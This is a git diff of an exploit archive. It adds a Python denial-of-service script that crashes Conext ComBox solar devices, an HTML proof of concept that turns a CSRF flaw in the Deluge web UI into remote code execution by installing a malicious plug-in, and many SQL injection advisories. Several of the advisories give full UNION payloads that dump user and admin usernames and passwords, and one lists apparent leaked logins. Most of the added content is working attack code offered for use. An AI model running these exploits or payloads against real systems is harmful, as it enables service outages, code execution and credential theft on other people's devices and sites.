 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
@@ -15924,7 +15927,7 @@ id,file,description,date,author,platform,type,port
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
 41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
-41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
+41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
@@ -37415,7 +37418,7 @@ id,file,description,date,author,platform,type,port
 41494,platforms/php/webapps/41494.txt,"Joomla! Component StreetGuessr Game 1.0 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
 41495,platforms/php/webapps/41495.txt,"Joomla! Component Guesser 1.0.4 - 'type' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
 41496,platforms/php/webapps/41496.txt,"Joomla! Component Recipe Manager 2.2 - 'id' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
-41497,platforms/php/webapps/41497.php,"Wordpress < 4.7.1 - Username Enumeration",2017-03-03,Dctor,php,webapps,0
+41497,platforms/php/webapps/41497.php,"WordPress < 4.7.1 - Username Enumeration",2017-03-03,Dctor,php,webapps,0
 41499,platforms/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,jsp,webapps,0
 41500,platforms/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",php,webapps,0
 41501,platforms/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",php,webapps,0
@@ -37425,3 +37428,31 @@ id,file,description,date,author,platform,type,port
 41506,platforms/php/webapps/41506.txt,"Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
 41507,platforms/php/webapps/41507.txt,"Joomla! Component Content ConstructionKit 1.1 - SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
 41508,platforms/php/webapps/41508.txt,"Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
+41512,platforms/php/webapps/41512.txt,"Advanced Bus Booking Script 2.04 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41513,platforms/php/webapps/41513.txt,"Entrepreneur Bus Booking Script 3.03 - 'hid_Busid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41514,platforms/php/webapps/41514.txt,"Single Theater Booking Script - 'newsid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41515,platforms/php/webapps/41515.txt,"Responsive Events & Movie Ticket Booking Script - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41516,platforms/php/webapps/41516.txt,"Online Cinema and Event Booking Script 2.01 - 'newsid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41517,platforms/php/webapps/41517.txt,"Redbus Clone Script 3.05 - 'hid_Busid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41518,platforms/php/webapps/41518.txt,"Groupon Clone Script 3.01 - 'catid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41519,platforms/php/webapps/41519.txt,"Naukri Clone Script 3.02 - 'type' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41520,platforms/php/webapps/41520.txt,"Yellow Pages Clone Script 1.3.4 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41521,platforms/php/webapps/41521.txt,"Advanced Matrimonial Script 2.0.3 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41522,platforms/php/webapps/41522.txt,"Advanced Real Estate Script 4.0.6 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41523,platforms/php/webapps/41523.txt,"PHP Classifieds Rental Script 3.6.0 - 'scatid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41524,platforms/php/webapps/41524.txt,"Entrepreneur B2B Script 2.0.4 - 'id' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41525,platforms/php/webapps/41525.txt,"PHP Matrimonial Script 3.0 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41526,platforms/php/webapps/41526.txt,"MLM Binary Plan Script 2.0.5 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41527,platforms/php/webapps/41527.txt,"MLM Forced Matrix 2.0.7 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41528,platforms/php/webapps/41528.txt,"MLM Forex Market Plan Script 2.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41529,platforms/php/webapps/41529.txt,"MLM Membership Plan Script 2.0.5 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41530,platforms/php/webapps/41530.txt,"Multireligion Responsive Matrimonial Script 4.7.1 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41531,platforms/php/webapps/41531.txt,"Network Community Script 3.0.2 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41532,platforms/php/webapps/41532.txt,"PHP B2B Script 3.05 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41533,platforms/php/webapps/41533.txt,"Responsive Matrimonial Script 4.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41534,platforms/php/webapps/41534.txt,"Schools Alert Management Script 2.01 - 'list_id' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41535,platforms/php/webapps/41535.txt,"Select Your College Script 2.01 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41536,platforms/php/webapps/41536.txt,"Social Network Script 3.01 - 'id' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41539,platforms/php/webapps/41539.txt,"Website Broker Script 3.02 - 'view' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41540,platforms/php/webapps/41540.py,"WordPress Multiple Plugins - Arbitrary File Upload",2017-03-03,"The Martian",php,webapps,0
+41541,platforms/json/webapps/41541.html,"Deluge Web UI 1.3.13 - Cross-Site Request Forgery",2017-03-06,"Kyle Neideck",json,webapps,0
diff --git a/platforms/hardware/dos/41537.py b/platforms/hardware/dos/41537.py
new file mode 100755
index 000000000..400e0aacc
--- /dev/null
+++ b/platforms/hardware/dos/41537.py
@@ -0,0 +1,44 @@
+#Exploit Title: Conext ComBox - Denial of Service (HTTP-POST)
+#Description: The exploit cause the device to self-reboot, constituting a denial of service.
+#Google Dork: "Conext ComBox" + "JavaScript was not detected" /OR/ "Conext ComBox" + "Recover Lost Password"
+#Date: March 02, 2017
+#Exploit Author: Mark Liapustin & Arik Kublanov
+#Vendor Homepage: http://solar.schneider-electric.com/product/conext-combox/
+#Software Link: http://cdn.solar.schneider-electric.com/wp-content/uploads/2016/06/conext-combox-data-sheet-20160624.pdf
+#Version: All firmware versions prior to V3.03 BN 830
+#Tested on: Windows and Linux
+#CVE: CVE-2017-6019
+
+# Use this script with caution!
+# Mark Liapustin: https://www.linkedin.com/in/clizsec/
+# Arik Kublanov: https://www.linkedin.com/in/arik-kublanov-57618a64/
+# =========================================================
+import subprocess
+import os
+import sys
+import time
+import socket
+# =========================================================
+
+print 'Usage: python ComBoxDos.py IP PORT'
+print 'Number of arguments:', len(sys.argv), 'arguments.'
+print 'Argument List:', str(sys.argv)
+
+print "ComBox Denial of Service via HTTP-POST Request"
+global cmdosip
+cmdosip = str(sys.argv[1])
+port = int(sys.argv[2])
+print "[!] The script will cause the Conext ComBox device to crash and to reboot itself."
+		
+print "Executing...\n\n\n"
+for i in range(1, 1000):
+  try:
+	cmdosdir = "login.cgi?login_username=Nation-E&login_password=DOS&submit=Log+In"
+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	s.connect((cmdosip, port))
+	print "[+] Sent HTTP POST Request to: " + cmdosip + " with /" + cmdosdir + " HTTP/1.1"
+	s.send("POST /" + cmdosdir + " HTTP/1.1\r\n")
+	s.send("Host: " + cmdosip + "\r\n\r\n")
+	s.close()
+  except: 
+     pass
diff --git a/platforms/json/webapps/41541.html b/platforms/json/webapps/41541.html
new file mode 100755
index 000000000..5e0057d37
--- /dev/null
+++ b/platforms/json/webapps/41541.html
@@ -0,0 +1,173 @@
+<!--
+Remote code execution via CSRF vulnerability in the web UI of Deluge 1.3.13
+
+Kyle Neideck, February 2017
+
+
+Product
+-------
+
+Deluge is a BitTorrent client available from http://deluge-torrent.org.
+
+Fix
+---
+
+Fixed in the (public) source code, but not in binary releases yet. See
+http://git.deluge-torrent.org/deluge/commit/?h=develop&id=11e8957deaf0c76fdfbac62d99c8b6c61cfdddf9
+and
+http://git.deluge-torrent.org/deluge/commit/?h=1.3-stable&id=318ab179865e0707d7945edc3a13a464a108d583
+
+Install from source or use the web UI from an incognito/private window until
+new binaries are released.
+
+Summary
+-------
+
+Deluge version 1.3.13 is vulnerable to cross-site request forgery in the Web UI
+plug-in resulting in remote code execution. Requests made to the /json endpoint
+are not checked for CSRF. See the "render" function of the "JSON" class in
+deluge/ui/web/json_api.py.
+
+The Web UI plug-in is installed, but not enabled, by default. If the user has
+enabled the Web UI plug-in and logged into it, a malicious web page can use
+forged requests to make Deluge download and install a Deluge plug-in provided
+by the attacker. The plug-in can then execute arbitrary code as the user
+running Deluge (usually the local user account).
+
+Timeline
+--------
+
+2017-03-01 Disclosed the vulnerability to Calum Lind (Cas) of Deluge Team
+2017-03-01 Vulnerability fixed by Calum Lind
+2017-03-05 Advisory released
+
+To Reproduce
+------------
+
+ - Create/find a Deluge plug-in to be installed on the victim machine. For
+   example, create an empty plug-in with
+       python deluge/scripts/create_plugin.py --name malicious --basepath . \
+           --author-name "n" --author-email "e"
+   (see
+   http://git.deluge-torrent.org/deluge/tree/deluge/scripts/create_plugin.py?h=1.3-stable&id=318ab179865e0707d7945edc3a13a464a108d583)
+   and add a line to its __init__.py to launch calc.exe.
+ - Build the plug-in as a .egg (if necessary):
+       python malicious/setup.py bdist_egg
+ - Make a torrent containing the .egg and seed it somewhere.
+ - Create a Magnet link for the torrent.
+ - In the proof-of-concept page below, update the PLUGIN_NAME, PLUGIN_FILE and
+   MAGNET_LINK constants.
+ - Put the PoC on a web server somewhere. Serving it locally is fine.
+ - In Deluge, open Preferences, go to the Plugins category and enable the Web
+   UI plug-in.
+ - Go to the WebUi preferences section and check "Enable web interface". The
+   port should be set to 8112 by default.
+ - If you're serving the PoC over HTTPS, check "Enable SSL" so its requests
+   don't get blocked as mixed content. If you're not, SSL can be enabled or
+   disabled.
+ - Go to localhost:8112 in a browser on the victim machine and log in.
+ - Open the PoC in the same browser.
+
+The PoC sends requests to localhost:8112 that include cookies. The first
+request adds the torrent, which downloads the .egg (the plug-in) to /tmp. It
+then sends repeated requests to install the .egg and enable it. The attacker's
+code in the plug-in runs when the plug-in is enabled.
+
+For the attack to be successful, the PoC page must be left open until the
+malicious plug-in finishes downloading. An attacker could avoid that limitation
+by using the Execute plug-in, which is installed by default, but Deluge has to
+be restarted before the Execute plug-in can be used. I don't think that can be
+done from the web UI, so the attacker's code would only execute after the
+victim restarted Deluge and then added/removed/completed a torrent.
+
+The PoC adds the plug-in torrent using a Magnet link because it would need to
+read the web UI's responses to add a .torrent file, which CORS prevents.
+
+Proof of Concept
+----------------
+-->
+
+<!--
+Deluge 1.3.13 Web UI CSRF
+
+Tested on Linux, macOS and Windows.
+
+Kyle Neideck, February 2017
+kyle@bearisdriving.com
+-->
+<html><body><script>
+let PLUGIN_NAME = 'malicious';
+let PLUGIN_FILE = 'malicious-0.1-py2.7.egg';
+let MAGNET_LINK =
+    'magnet:?xt=urn:btih:1b02570de69c0cb6d12c544126a32c67c79024b4' +
+        '&dn=malicious-0.1-py2.7.egg' +
+        '&tr=http%3A%2F%2Ftracker.example.com%3A6969%2Fannounce';
+
+function send_deluge_json(json) {
+    console.log('Sending: ' + json);
+
+    for (let proto of ['http','https']) {
+        let xhr = new XMLHttpRequest();
+
+        xhr.open('POST', proto + '://localhost:8112/json');
+        xhr.setRequestHeader('Content-Type', 'text/plain');
+        xhr.withCredentials = true;
+        xhr.onload = function() { console.log(xhr); };
+        xhr.send(json);
+    }
+}
+
+let download_location =
+    (navigator.appVersion.indexOf("Win") != -1) ?
+        'C:\\\\Users\\\\Public' : '/tmp';
+
+// Download a malicious plugin using a Magnet link.
+//
+// Using the /upload endpoint or adding a .torrent file wouldn't work. We could
+// upload the file (either a .torrent or the plug-in itself), but it would be
+// saved in a temp dir with a random name. CORS would prevent us from reading
+// the path to the file from the response, and to finish the process we'd need
+// to send a second request that includes that path.
+send_deluge_json('{' +
+    '"method":"web.add_torrents",' +
+    '"params":[[{' +
+        '"path":"' + MAGNET_LINK + '",' +
+        '"options":{' +
+            '"file_priorities":[],' +
+            '"add_paused":false,' +
+            '"compact_allocation":false,' +
+            '"download_location":"' + download_location + '",' +
+            '"move_completed":false,' +
+            '"move_completed_path":"' + download_location + '",' +
+            '"max_connections":-1,' +
+            '"max_download_speed":-1,' +
+            '"max_upload_slots":-1,' +
+            '"max_upload_speed":-1,' +
+            '"prioritize_first_last_pieces":false}}]],' +
+        '"id":12345}');
+
+window.stop = false;
+
+// Repeatedly try to enable the plugin, since we can't tell when it will finish
+// downloading.
+function try_to_add_and_enable_plugin() {
+    send_deluge_json('{' +
+        '"method":"web.upload_plugin",' +
+        '"params":["' + PLUGIN_FILE + '","' +
+            download_location + '/' + PLUGIN_FILE + '"],' +
+        '"id":12345}');
+
+    send_deluge_json('{' +
+        '"method":"core.enable_plugin",' +
+        '"params":["' + PLUGIN_NAME + '"],' +
+        '"id":12345}');
+
+    if (!window.stop) {
+        window.setTimeout(try_to_add_and_enable_plugin, 500);
+    }
+}
+
+try_to_add_and_enable_plugin();
+</script>
+<button onclick="window.stop = true">Stop sending requests</button>
+</body></html>
diff --git a/platforms/php/webapps/41497.php b/platforms/php/webapps/41497.php
index a740d9cb1..00531c6a4 100755
--- a/platforms/php/webapps/41497.php
+++ b/platforms/php/webapps/41497.php
@@ -8,7 +8,7 @@
 header ('Content-type: text/html; charset=UTF-8');
 
 
-$url= "https://bucaneiras.org/";
+$url= "http://localhost/";
 $payload="wp-json/wp/v2/users/";
 $urli = file_get_contents($url.$payload);
 $json = json_decode($urli, true);
diff --git a/platforms/php/webapps/41512.txt b/platforms/php/webapps/41512.txt
new file mode 100755
index 000000000..b5431f3c8
--- /dev/null
+++ b/platforms/php/webapps/41512.txt
@@ -0,0 +1,20 @@
+# # # # # 
+# Exploit Title: Advanced Bus Booking Script v2.04 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/advanced-bus-booking-script/
+# Demo: http://travelbookingscript.com/demo/newbusbooking/
+# Version: 2.04
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
+# http://localhost/[PATH]/seatcheck.php?busid=[SQL]
+# http://localhost/[PATH]/seatcheck.php?seat=[SQL]
+# http://localhost/[PATH]/seatcheck.php?seat=1&busid=1&dat=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41513.txt b/platforms/php/webapps/41513.txt
new file mode 100755
index 000000000..6a2346021
--- /dev/null
+++ b/platforms/php/webapps/41513.txt
@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Entrepreneur Bus Booking Script v3.03 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/entrepreneur-bus-booking-script/
+# Demo: http://travelbookingscript.com/demo/busbooking/
+# Version: 3.03
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
+# # # # #
+
diff --git a/platforms/php/webapps/41514.txt b/platforms/php/webapps/41514.txt
new file mode 100755
index 000000000..f5d65b5f1
--- /dev/null
+++ b/platforms/php/webapps/41514.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Single Theater Booking Script - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/single-theater-booking-script/
+# Demo: http://www.theaterbookingscript.com/demo/theater-booking/single-theater/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news_desc.php?newsid=[SQL]
+# For example;
+# -7'+/*!50000union*/+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6-- -
+# users :user_id
+# users :email
+# users :user_name
+# users :password
+# users :mobile
+# users :country
+# users :state
+# -7'+/*!13337union*/+select+1,/*!13337concat*/(0x496873616e2053656e63616e203c62723e,user_name,0x3a,password),3,4,5,6+from+users-- -
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41515.txt b/platforms/php/webapps/41515.txt
new file mode 100755
index 000000000..ae48207cb
--- /dev/null
+++ b/platforms/php/webapps/41515.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Responsive Events & Movie Ticket Booking Script - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/responsive-events-movie-ticket-booking-script/
+# Demo: http://theaterbookingscript.com/demo/advanced-ticketbooking/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news_desc.php?newsid=[SQL]
+# For example;
+# -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6-- -
+# users :user_id
+# users :email
+# users :user_name
+# users :password
+# users :mobile
+# users :country
+# users :state
+# -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,/*!13337Concat*/(user_name,0x3a,password),5,6+from+users-- -
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41516.txt b/platforms/php/webapps/41516.txt
new file mode 100755
index 000000000..9063f1846
--- /dev/null
+++ b/platforms/php/webapps/41516.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Online Cinema and Event Booking Script v2.01 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/online-cinema-and-event-booking-script/
+# Demo: http://theaterbookingscript.com/demo/events-movie/
+# Version: 2.01
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news_desc.php?newsid=[SQL]
+# For example;
+# -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6-- -
+# users :user_id
+# users :email
+# users :user_name
+# users :password
+# users :mobile
+# users :country
+# users :state
+# -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,/*!13337Concat*/(user_name,0x3a,password),5,6+from+users-- -
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41517.txt b/platforms/php/webapps/41517.txt
new file mode 100755
index 000000000..ddd3f2c28
--- /dev/null
+++ b/platforms/php/webapps/41517.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Redbus Clone Script v3.05 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/redbus-clone/
+# Demo: http://198.38.86.159/~materialmag/demo/redbus-clone-responsive/
+# Version: 3.05
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41518.txt b/platforms/php/webapps/41518.txt
new file mode 100755
index 000000000..dd2e36909
--- /dev/null
+++ b/platforms/php/webapps/41518.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Groupon Clone Script v3.01 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/groupon-clone-script/
+# Demo: http://phpscriptsmall.info/demo/groupon-deal/
+# Version: 3.01
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/product-show.php?catid=[SQL]
+# For example;
+# -40+/*!50000union*/+select+1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -
+# admin :admin_id
+# admin :user
+# admin :pass
+# admin :address
+# admin :mobile
+# -40+/*!50000union*/+select+1,2,3,4,5,/*!50000concat*/(user,0x3a,pass),7,8,9,10,11,12,13,14,15,16,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,18,19,20,21,22+from+admin-- -
+# # # # #
diff --git a/platforms/php/webapps/41519.txt b/platforms/php/webapps/41519.txt
new file mode 100755
index 000000000..b11d97703
--- /dev/null
+++ b/platforms/php/webapps/41519.txt
@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Naukri Clone Script v3.02 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://phpscriptsmall.com/product/naukri-clone-script/
+# Demo: http://phpscriptsmall.biz/demo/jobsite/
+# Version: 3.02
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/placement.php?type=[SQL]
+# -1'+/*!50000union*/+select+1,@@version,3,4,5,6,7,8-- -
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41520.txt b/platforms/php/webapps/41520.txt
new file mode 100755
index 000000000..b7e27e5e0
--- /dev/null
+++ b/platforms/php/webapps/41520.txt
@@ -0,0 +1,22 @@
+# # # # # 
+# Exploit Title: Yellow Pages Clone Script v1.3.4 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/yellow-pages-clone-script/
+# Demo: http://dexteritysolution.com/demo/directory/
+# Version: 1.3.4
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/testmonial.php?blogid=[SQL]
+# -2'+/*!50000union*/+select+1,@@version,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6-- -
+# http://localhost/[PATH]/blog.php?blogid=[SQL]
+# -2'+/*!50000union*/+select+1,@@version,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,6,7,8,9,10,11,12-- -
+# Etc...
+# # # # #
+
diff --git a/platforms/php/webapps/41521.txt b/platforms/php/webapps/41521.txt
new file mode 100755
index 000000000..705713d00
--- /dev/null
+++ b/platforms/php/webapps/41521.txt
@@ -0,0 +1,31 @@
+# # # # # 
+# Exploit Title: Advanced Matrimonial Script v2.0.3 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/advanced-matrimonial/
+# Demo: http://74.124.215.220/~admatrimon/
+# Version: 2.0.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/photoalbum.php?userid=[SQL]
+# http://localhost/[PATH]/members_result.php?match_result=[SQL]
+# http://localhost/[PATH]/search_result.php?cityse=Basic+Search&gender=Male&age_from=[SQL]&marital=[SQL]&religion=[SQL]&caste=[SQL]&country=[SQL]&education=[SQL]&Submit=Search
+# For example;
+# photoalbum.php?userid=-22'+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),86,87,88,89-- -
+# status:adminlogin
+# admin_id:adminlogin
+# admin_username:adminlogin
+# admin_password:adminlogin
+# admin_email:adminlogin
+# photoalbum.php?userid=-22'+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,/*!50000concat(*/admin_username,/*!50000char*/(58),admin_password),86,87,88,89+from+adminlogin-- -
+# <input type="hidden" name="userid" value="admin:inetsol" />
+# <input type="hidden" name="userid" value="raj:123456" />
+# <input type="hidden" name="userid" value="sath:123456" />
+# Etc... Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41522.txt b/platforms/php/webapps/41522.txt
new file mode 100755
index 000000000..586ded134
--- /dev/null
+++ b/platforms/php/webapps/41522.txt
@@ -0,0 +1,24 @@
+# # # # # 
+# Exploit Title: Advanced Real Estate Script v4.0.6 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/advanced-real-estate-script/
+# Demo: http://www.phprealestatescript.org/advanced_realestate/
+# Version: 4.0.6
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/state.php?country=[SQL]
+# http://localhost/[PATH]/city.php?city=[SQL]
+# http://localhost/[PATH]/locat.php?locat=[SQL]
+# For example;
